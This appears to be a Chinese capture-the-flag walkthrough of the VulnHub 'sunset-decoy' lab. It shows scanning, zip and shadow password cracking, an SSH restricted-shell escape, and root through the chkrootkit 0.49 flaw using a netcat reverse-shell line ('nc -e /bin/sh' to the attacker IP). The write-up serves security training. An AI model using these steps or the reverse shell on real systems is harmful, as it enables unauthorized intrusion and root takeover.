猫宁~~~
地址:https://www.vulnhub.com/entry/sunset-decoy,505/
关注工具和思路。
nmap 192.168.43.0/24
靶机IP
192.168.43.32
攻击机
192.168.43.154
nmap -A -p1-65535 192.168.43.32
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
访问http://192.168.43.32/,发现目录暴露文件save.zip,解压需要密码
dirb http://192.168.43.32/
zip2john save.zip > pojie.hash
cat pojie.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pojie.hash
结果manuel (save.zip)
unzip save.zip
输入密码manuel
显示文件夹etc,内有文件group hostname hosts passwd shadow sudoers
进入/root/Desktop/etc
cat shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
获知
server (296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828是用户名
ssh 296640a3b825115a47b68fc44501c828@192.168.43.32
密码server
提示-rbash: dircolors: command not found
ssh 296640a3b825115a47b68fc44501c828@192.168.43.32 -t "bash --noprofile"
echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
修改环境变量
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
cat user.txt
35253d886842075b2c6390f35946e41f
./honeypot.decoy,执行二进制文件
cd /home/296640a3b825115a47b68fc44501c828/SV-502/logs
cat log.txt
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
searchsploit chkrootkit
Chkrootkit 0.49 - Local Privilege Escalation linux/local/33899.txt
https://www.exploit-db.com/exploits/33899
echo "/usr/bin/nc -e /bin/sh 192.168.43.154 4444" > /tmp/update
chmod +777 /tmp/update
进入 /home/296640a3b825115a47b68fc44501c828/
./honeypot.decoy
选择
5 Launch an AV Scan.
攻击机nc -lvnp 4444
connect to [192.168.43.154] from (UNKNOWN) [192.168.43.32] 4444
获取权限
id
uid=0(root) gid=0(root) groups=0(root)
cat root.txt